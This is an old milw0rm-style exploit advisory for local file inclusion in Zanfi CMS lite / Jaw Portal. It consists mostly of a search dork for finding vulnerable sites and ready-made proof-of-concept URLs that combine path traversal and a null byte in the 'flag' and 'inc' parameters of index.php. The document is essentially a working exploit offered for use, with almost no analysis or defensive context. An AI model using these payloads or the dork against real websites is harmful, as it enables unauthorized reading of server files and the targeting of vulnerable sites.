31 lines
No EOL
897 B
Text
31 lines
No EOL
897 B
Text
############################################################################################################
|
|
[+]Zanfi CMS lite / Jaw Portal free (index.php page) Multiple Local File Inclusion
|
|
[+]Discovered by SirGod
|
|
[+]MorTal TeaM
|
|
[+]Greetz E.M.I.N.EM,Ras,Puscas_marin,ToxicBlood,HrN,Kemrayz,007m
|
|
############################################################################################################
|
|
|
|
[+] Dork : Powered by: Zanfi Solutions
|
|
|
|
[+] Local File Inclusion
|
|
|
|
PoC :
|
|
|
|
http://[target]/[Path]index.php?flag=[Local File]%00
|
|
|
|
Example :
|
|
|
|
http://127.0.0.1/index.php?flag=../../../autoexec.bat%00
|
|
|
|
|
|
PoC :
|
|
|
|
http://[target]/[Path]/index.php?inc=[Local File]%00
|
|
|
|
Example :
|
|
|
|
http://127.0.0.1/index.php?inc=../../../autoexec.bat%00
|
|
|
|
############################################################################################################
|
|
|
|
# milw0rm.com [2008-09-10] |